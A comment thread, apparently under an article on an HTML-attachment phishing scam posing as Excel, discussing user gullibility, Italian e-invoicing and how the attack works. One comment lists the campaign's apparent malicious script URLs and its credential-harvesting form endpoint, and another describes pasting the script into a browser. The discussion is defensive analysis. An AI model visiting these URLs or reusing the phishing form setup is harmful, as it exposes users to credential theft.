Why would you open an html file from an unknown person... And cmon, someone would really open an html file IN THE BROWSER and then think, oh this is Microsoft Excel program, totally not the browser that I just opened an html file with?? It doesn't even matter morse code or not, if you open an html file from an unknown person AND THEN THINK ITS MICROSOFT EXCEL you deserve to get phished. Unless are you old grandma or grandpa, then you are forgiven
In Italy this phishing attack on companies would be unlikely. We use electronic invoicing sent to the Tax Agency via a certified interchange system. Very rarely is the electronic invoice, in XML format, sent via certified e-mail (PEC). Any courtesy invoice that is sent to the company almost exclusively in PDF format has no legal value. So there is no reason for interaction.
There was no link mentioned in the article, where did you go to receive that notification? I assume you personally tested it yourself by editting the DOM on google.com?
No I just typed out one of the scripts from the link provided by the OP, then copied/pasted it into the address bar from the Google home page. NoScript alerted to the XSS attempt.
To be honest, that JS by itself was safe, you can check the contents if you go to it http://coollab.jp/dir/root/p/434.js and then you unescape the content Same for http://coollab.jp/dir/root/p/09908.js It is really that bit over here form action that is the dangerous part, when you submit the form it carries the action described in the link http://www.tanikawashuntaro.com//cgi-bin/root-6544323232000/0453000.php?90989897-45453 which is now down (or we lack permissions to view it) So No script technically did nothing, because the script could have simply been pasted in the body instead of referring to a link with the script itself. But of course, that would not have circumvented the email filters
